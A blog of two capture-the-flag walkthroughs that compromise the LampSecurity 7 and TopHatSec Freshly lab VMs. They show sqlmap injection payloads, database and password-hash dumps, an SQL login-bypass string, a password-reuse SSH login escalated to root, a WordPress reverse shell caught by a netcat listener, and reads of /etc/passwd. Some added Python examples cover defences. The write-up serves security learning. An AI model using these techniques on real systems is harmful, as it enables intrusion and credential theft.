Sunday, 21 February 2016

Walkthrough LampSecurity Version 7

CTF series LAMP SECURITY 7: I have been spending a lot of time trying to improve my hacking skills in order to prepare for my OffSec certification challenge. I have been struggling to improve my average time to compromise a box (remember, I need to do 5 in 24 hours to clear the OffSec challenge), so any easy boxes I find along the way are welcome :P. They kinda increase my confidence. LampSecurity 7 seems like one such box. I am glad I pwned it, and in optimal time too (IMHO, since the time can vary greatly depending on the skill of the person). Thanks to the author for helping me prepare for the exam :-)

Detailed steps to get root:

An nmap scan of the box reveals a number of open services.

Not shown: 64991 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 41:8a:0d:5d:59:60:45:c4:c4:15:f3:8a:8d:c0:99:19 (DSA)
|_ 2048 66:fb:a3:b4:74:72:66:f4:92:73:8f:bf:61:ec:8b:35 (RSA)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Mad Irish Hacking Academy
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
| http-auth:
| HTTP/1.0 401 Authorization Required
|_ Basic realm=SWAT
| http-methods:
|_ Supported Methods: GET POST
|_http-title: 401 Authorization Required
5900/tcp closed vnc
8080/tcp open http Apache httpd 2.2.15 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.2.15 (CentOS)
| http-title: Admin :: Mad Irish Hacking Academy
|_Requested resource was /login.php
10000/tcp open http MiniServ 1.610 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 9A2006C267DE04E262669D821B57EAD1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: MiniServ/1.610
|_http-title: Login to Webmin
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.13
Uptime guess: 49.711 days (since Thu Dec 24 10:56:35 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.5.10-125.el6)
| Computer name: localhost
| NetBIOS computer name:
| Domain name:
| FQDN: localhost
|_ System time: 2016-01-28T10:39:45-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms 192.168.116.139


We see a web application running on the box. While playing around with it we notice the /newsletter URL; adding a ' to the URL produces a detailed error message, which leads us to believe that the box suffers from SQL injection.



We capture the request using Burp and run sqlmap against it to see if we can find any interesting databases.

cat sql.file
GET /newsletter&id=1 HTTP/1.1
Host: 192.168.116.139
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=pv1evkh5h3rjfajojfdbiqnd72; testing=1; roundcube_sessid=0oo5o02r2217dbff3t53j40j06
Connection: close


sqlmap -r sql.file --dbs
[sqlmap banner] {1.0-dev-nongit-201602070a89} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:47:12
........
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://192.168.116.139:80/newsletter&id=1 AND 6207=6207
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://192.168.116.139:80/newsletter&id=1 AND (SELECT 2804 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(2804=2804,1))),0x716a767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://192.168.116.139:80/newsletter&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xbRE)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: http://192.168.116.139:80/newsletter&id=-9786 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176707671,0x6645506a52417641745455654c44514f5554746b42486e4f496a434c6b6a5372506f766a696a4f4f,0x716a767a71),NULL-- -
---
[11:47:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
[11:47:14] [INFO] fetching database names
[11:47:14] [INFO] the SQL query used returns 4 entries
[11:47:14] [INFO] resumed: information_schema
[11:47:14] [INFO] resumed: mysql
[11:47:14] [INFO] resumed: roundcube
[11:47:14] [INFO] resumed: website
available databases [4]:
[*] information_schema
[*] mysql
[*] roundcube
[*] website


Sqlmap is able to enumerate four databases for us, namely i) information_schema, ii) mysql, iii) roundcube and iv) website.
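The root cause behind the /newsletter error above is a query that splices the id parameter straight into the SQL text. The following is an added example, not code from the VM or its author: it rebuilds that pattern against a constructed in-memory SQLite database (the newsletter table and its rows are assumptions), runs the same boolean and UNION shapes sqlmap reports above against the vulnerable form, and shows that the parameterised form treats the same input as an ordinary value.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the "website" database; not data from the box.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE newsletter (id INTEGER PRIMARY KEY, subject TEXT)")
    conn.executemany(
        "INSERT INTO newsletter VALUES (?, ?)",
        [(1, "January issue"), (2, "February issue")],
    )
    return conn


def lookup_vulnerable(conn, raw_id):
    # The anti-pattern behind the error seen on /newsletter&id=1': the raw
    # parameter becomes part of the SQL text, so it can carry its own SQL.
    sql = "SELECT subject FROM newsletter WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, raw_id):
    # Hardened form: reject anything that is not a plain integer, then bind the
    # value as a parameter so it can never be parsed as SQL.
    try:
        ident = int(raw_id)
    except ValueError:
        return []
    sql = "SELECT subject FROM newsletter WHERE id=?"
    return [row[0] for row in conn.execute(sql, (ident,))]


def demo():
    conn = make_db()
    results = {}
    # Boolean-based blind: a true condition keeps the row, a false one drops it.
    results["vuln_true"] = lookup_vulnerable(conn, "1 AND 6207=6207")
    results["vuln_false"] = lookup_vulnerable(conn, "1 AND 6207=6208")
    # UNION-based: an impossible id plus UNION reads from another table
    # (sqlite_master here stands in for MySQL's information_schema).
    results["vuln_union"] = lookup_vulnerable(
        conn, "-9786 UNION ALL SELECT name FROM sqlite_master"
    )
    # A stray quote leaks a database error, which is what tipped us off.
    try:
        lookup_vulnerable(conn, "1'")
        results["vuln_quote"] = "no error"
    except sqlite3.OperationalError:
        results["vuln_quote"] = "syntax error leaked"
    # The same payload against the safe version is just an invalid id.
    results["safe_true"] = lookup_safe(conn, "1 AND 6207=6207")
    results["safe_plain"] = lookup_safe(conn, "1")
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The MySQL payloads in the sqlmap output (ELT/FLOOR(RAND()) error-based, SLEEP-based) do not run on SQLite, but the boolean and UNION shapes are engine-independent and are enough to show why the fix is binding the parameter rather than filtering quotes.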

We try to dump the contents of these databases using the sqlmap -D parameter.

sqlmap -r sql.file --dbs -D website --dump
....
....
[11:47:43] [INFO] fetching tables for database: 'website'
[11:47:43] [INFO] the SQL query used returns 9 entries
[11:47:43] [INFO] resumed: contact
[11:47:43] [INFO] resumed: documents
[11:47:43] [INFO] resumed: hits
[11:47:43] [INFO] resumed: log
[11:47:43] [INFO] resumed: newsletter
[11:47:43] [INFO] resumed: payment
[11:47:43] [INFO] resumed: trainings
[11:47:43] [INFO] resumed: trainings_x_users
[11:47:43] [INFO] resumed: users
[11:47:43] [INFO] fetching columns for table 'hits' in database 'website'
....
....
Database: website
Table: users
[13 entries]
+---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+
| user_id | profile | username | realname | password | last_login |
+---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+
| 4 | <blank> | john@localhost.localdomain | John Durham | 0d9ff2a4396d6939f80ffe09b1280ee1 | NULL |
| 5 | <blank> | alice@localhost.localdomain | Alice Wonder | 2146bf95e8929874fc63d54f50f1d2e3 | NULL |
| 6 | <blank> | ruby@localhost.localdomain | Ruby Spinster | 9f80ec37f8313728ef3e2f218c79aa23 | NULL |
| 7 | <blank> | leon@localhost.localdomain | Leon Parnetta | 5d93ceb70e2bf5daa84ec3d0cd2c731a (qwer1234) | NULL |
| 8 | <blank> | julia@localhost.localdomain | Julia Fields | ed2539fe892d2c52c42a440354e8e3d5 (madrid) | NULL |
| 9 | <blank> | michael@localhost.localdomain | Michael Saint | 9c42a1346e333a770904b2a2b37fa7d3 (somepassword) | NULL |
| 10 | <blank> | bruce@localhost.localdomain | Bruce Pottricks | 3a24d81c2b9d0d9aaf2f10c6c9757d4e | NULL |
| 11 | <blank> | neil@localhost.localdomain | Neil Felstein | 4773408d5358875b3764db552a29ca61 | NULL |
| 12 | <blank> | charles@localhost.localdomain | Charles Adams | b2a97bcecbd9336b98d59d9324dae5cf | NULL |
| 36 | <blank> | foo@bar.com | <blank> | 4cb9c8a8048fd02294477fcb1a41191a (changeme) | NULL |
| 114 | <blank> | <blank> | <blank> | d41d8cd98f00b204e9800998ecf8427e () | NULL |
| 113 | <blank> | test@nowhere.com | <blank> | 098f6bcd4621d373cade4e832627b4f6 (test) | NULL |
| 3 | Brian is our technical brains behind the operations and a chief trainer. | brian@localhost.localdomain | Brian Hershel | e22f07b17f98e0d9d364584ced0e3c18 | 2012-12-19 11:30:54 |
+---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+


Sqlmap is able to dump the various tables in the website database. We keep dumping the contents of these tables until we see that the `users` table holds a list of users and their password hashes (sqlmap cracks the weaker ones for us as well; it is so amazing and powerful!). Luckily for us, the passwords are not salted.
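Why unsalted hashes fall so quickly, and what the fix looks like, as an added example (not code from the VM or its author). It takes a few of the hashes from the users table above, resolves them with a constructed toy wordlist the way sqlmap's built-in cracker does, and then shows the hardened alternative: a per-user random salt with a slow KDF (PBKDF2-HMAC-SHA256, the iteration count and storage format are my assumptions) and a constant-time comparison on verify.

```python
import hashlib
import hmac
import os

# Hashes copied from the users table dumped above (user -> unsalted MD5).
DUMPED = {
    "test@nowhere.com": "098f6bcd4621d373cade4e832627b4f6",
    "foo@bar.com": "4cb9c8a8048fd02294477fcb1a41191a",
    "<blank user 114>": "d41d8cd98f00b204e9800998ecf8427e",
    "leon@localhost.localdomain": "5d93ceb70e2bf5daa84ec3d0cd2c731a",
    "brian@localhost.localdomain": "e22f07b17f98e0d9d364584ced0e3c18",
}

# Constructed toy wordlist; sqlmap ships a much larger one.
WORDLIST = ["password", "test", "madrid", "qwer1234", "changeme", "somepassword", ""]


def md5_lookup(hashes, words):
    # With no salt, one precomputed table serves every user: hash each word
    # once, then look every dumped hash up in it. Uncracked entries map to None.
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in words}
    return {user: table.get(h) for user, h in hashes.items()}


def hash_password(password, iterations=600_000):
    # Hardened storage: 16 random salt bytes per user plus a deliberately slow
    # KDF, so a table built for one user is useless for the next.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    # Recompute with the stored salt and iteration count; compare in constant
    # time so the check does not leak how many leading bytes matched.
    _algo, iters, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    for user, plain in md5_lookup(DUMPED, WORDLIST).items():
        print(f"{user}: {plain!r}")
    stored = hash_password("madrid")
    print(stored)
    print(verify_password("madrid", stored), verify_password("Madrid", stored))
```

Two users with the same password get different stored strings under hash_password, so the shared-lookup shortcut that md5_lookup relies on no longer exists; hashing the whole table one word at a time is the only option left, and the iteration count makes each attempt expensive.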

We know that the box is running an SSH service, so we try to log in to the box hoping that at least one user has reused their password for SSH.

We SSH into the box as julia, and it turns out she is in the wheel group (the sudo users list), so we can immediately escalate our privileges to root :-) Simple and easy.

ssh julia@192.168.116.139
julia@192.168.116.139's password:
Last login: Thu Jan 28 17:58:01 2016 from 192.168.116.137
[julia@localhost ~]$ id
uid=506(julia) gid=506(julia) groups=506(julia),10(wheel),511(sales) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[julia@localhost ~]$ sudo /bin/bash
[sudo] password for julia:
[root@localhost julia]#



Sunday, 7 February 2016

Walkthrough TopHatSec Freshly

Mission `Freshly` VM: I downloaded the virtual machine hosted at https://www.vulnhub.com/entry/tophatsec-freshly,118/ . There are a couple of challenges from TopHatSec and I would like to try them both. Well, for starters, here is `Freshly` :-)

Detailed steps for getting root:

An nmap scan of the box reveals that ports 80, 443 and 8080 are publicly accessible on the box.


We quickly run both nikto and dirbuster against the web server. We see that the VM is running a login application on port 80, while on the other ports it is running a WordPress blog.


Screenshot: login prompt
Screenshot: WordPress blog
We also see an installation of phpMyAdmin on the web server. We try the default credentials but do not succeed. Since phpMyAdmin is running on the box we guess that there may be a MySQL server running at the backend as well, so we try a MySQL authentication bypass by using wronguser' or 1=1 LIMIT 1;# as the username and junk as the password. However, we are not successful. In spite of this, it is worth the effort to run sqlmap against the server to see if it can pick up an injection point in either the username or password field.

sqlmap -o -u http://192.168.116.135/login.php --forms --dbs
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 111 HTTP(s) requests:
---
Parameter: user (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: user=VXNQ' AND (SELECT * FROM (SELECT(SLEEP(5)))BNMi) AND 'EOBB'='EOBB&password=&s=Submit
---
do you want to exploit this SQL injection? [Y/n] y
[05:29:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12


Sqlmap tells us that the `user` parameter of the login form is susceptible to a MySQL injection vulnerability. It readily exploits this vulnerability for us and gives us a complete dump of the database when we use the --dump sqlmap option.
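The time-based blind technique sqlmap settled on here (a SLEEP(5) inside the POSTed user field) leaves a signature a defender can read off the web server logs even though POST bodies are not logged: a burst of requests to the same path from one client whose service time clusters just above the sleep delay. The following is an added example, not code from the VM or its author. It assumes Apache's combined log format with %D (request time in microseconds) appended, parses a few constructed sample lines (not real traffic from the box; the sqlmap User-Agent shown is a constructed sample), and flags both the slow burst and the unchanged default scanner User-Agent.

```python
import re
from collections import Counter

# Apache combined format plus %D, i.e.
#   LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %D"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<micros>\d+)$'
)

# Constructed sample log (not from the VM): two ordinary login requests, one
# isolated slow page load, then a burst of POSTs to login.php from one client
# that each take just over five seconds, as SLEEP(5) probing would leave.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Feb/2016:05:20:01 -0500] "GET /login.php HTTP/1.1" 200 1843 "-" "Mozilla/5.0 (X11; Linux x86_64)" 18231
10.0.0.5 - - [07/Feb/2016:05:20:09 -0500] "POST /login.php HTTP/1.1" 302 0 "http://192.168.116.135/login.php" "Mozilla/5.0 (X11; Linux x86_64)" 24110
10.0.0.5 - - [07/Feb/2016:05:21:40 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)" 6100000
192.168.116.128 - - [07/Feb/2016:05:29:01 -0500] "POST /login.php HTTP/1.1" 200 1843 "-" "sqlmap/1.0-dev (http://sqlmap.org)" 5012345
192.168.116.128 - - [07/Feb/2016:05:29:06 -0500] "POST /login.php HTTP/1.1" 200 1843 "-" "sqlmap/1.0-dev (http://sqlmap.org)" 5009871
192.168.116.128 - - [07/Feb/2016:05:29:11 -0500] "POST /login.php HTTP/1.1" 200 1843 "-" "sqlmap/1.0-dev (http://sqlmap.org)" 21000
192.168.116.128 - - [07/Feb/2016:05:29:12 -0500] "POST /login.php HTTP/1.1" 200 1843 "-" "sqlmap/1.0-dev (http://sqlmap.org)" 5015002
192.168.116.128 - - [07/Feb/2016:05:29:17 -0500] "POST /login.php HTTP/1.1" 200 1843 "-" "sqlmap/1.0-dev (http://sqlmap.org)" 5011110
192.168.116.128 - - [07/Feb/2016:05:29:22 -0500] "POST /login.php HTTP/1.1" 200 1843 "-" "sqlmap/1.0-dev (http://sqlmap.org)" 5008777
"""


def parse(lines):
    # Yield one dict per well-formed line, with service time converted to seconds.
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["seconds"] = int(rec["micros"]) / 1_000_000
            yield rec


def slow_bursts(lines, min_seconds=4.5, min_hits=3):
    # Count slow requests per (client, path); report pairs that cross min_hits.
    # A single slow page is noise; repeated ~5 s hits on one endpoint are not.
    counts = Counter()
    for rec in parse(lines):
        if rec["seconds"] >= min_seconds:
            counts[(rec["ip"], rec["path"])] += 1
    return {key: n for key, n in counts.items() if n >= min_hits}


def scanner_agents(lines):
    # Cheap secondary signal: sqlmap announces itself unless --random-agent is used.
    return sorted({rec["ip"] for rec in parse(lines) if "sqlmap" in rec["ua"].lower()})


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("slow bursts:", slow_bursts(lines))
    print("scanner user agents from:", scanner_agents(lines))
```

The burst detector is the more durable of the two signals, since a User-Agent is trivially changed while the delay is the whole point of a time-based probe; the fast request in the middle of the burst shows that the "false" branch of a blind probe returns at normal speed and is correctly not counted.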


sqlmap -o -u http://192.168.116.135/login.php --forms --dump --dbs
....
....
....
05:54:23] [INFO] resumed: wordpress8080
available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080

Excellent! Now we can see that there are a total of 7 databases on the server. We must check out the interesting ones, especially login, phpmyadmin, users and wordpress8080.

1) TABLE LOGIN
05:53:38] [INFO] analyzing table dump for possible password hashes
Database: login
Table: users
[2 entries]
+----------+-----------+
| password | user_name |
+----------+-----------+
| password | candyshop |
| PopRocks | Sir |
+----------+-----------+
2) TABLE wordpress8080
Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password |
+----------+---------------------+
| admin | SuperSecretPassword |
+----------+---------------------+
3) TABLE users
[06:03:42] [WARNING] database 'users' appears to be empty
[06:03:42] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
[06:03:50] [CRITICAL] unable to retrieve the tables in database 'users'
4) TABLE phpmyadmin
Database: phpmyadmin
Table: pma_table_info
[0 entries]
+---------+------------+---------------+
| db_name | table_name | display_field |
+---------+------------+---------------+
+---------+------------+---------------+
Database: phpmyadmin
Table: pma_relation
[0 entries]
+-----------+------------+--------------+--------------+---------------+---------------+
| master_db | foreign_db | master_table | master_field | foreign_table | foreign_field |
+-----------+------------+--------------+--------------+---------------+---------------+
+-----------+------------+--------------+--------------+---------------+---------------+
[WARNING] table 'pma_table_uiprefs' in database 'phpmyadmin' appears to be empty
Database: phpmyadmin
Table: pma_table_uiprefs
[0 entries]
+-------+---------+----------+------------+-------------+
| prefs | db_name | username | table_name | last_update |
+-------+---------+----------+------------+-------------+
+-------+---------+----------+------------+-------------+
It seems the rest of the tables in the phpmyadmin database are empty as well.


It seems that the table dump of the wordpress8080 database contains the admin password for the WordPress blog. We try to log in to the WordPress blog with these credentials and we are successful!


Once we have admin credentials on WordPress, getting a shell on the box is extremely simple. By default WordPress will not allow any PHP code to run from within articles/posts. However, since we have admin privileges on WordPress, we can install a plugin called Exec-PHP to allow PHP code to run in WordPress pages.

We install the plugin in our WordPress installation and then follow the instructions at https://wordpress.org/plugins/exec-php/installation/ to run PHP code in the article body. Once a simple PHP hello world example works, we use the php-reverse-shell script available at http://pentestmonkey.net/tools/web-shells/php-reverse-shell . We set up a netcat listener and sure enough we get our shell :-)


nc -lvnp 4545
listening on [any] 4545 ...
connect to [192.168.116.128] from (UNKNOWN) [192.168.116.135] 57118
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
02:30:03 up 3:21, 0 users, load average: 4.19, 4.26, 4.75
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@Freshly:/home/user$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
daemon@Freshly:/home/user$ cat /etc/issue
cat /etc/issue
Ubuntu 14.04.1 LTS \n \l

There we have our flag. A fun challenge indeed :-)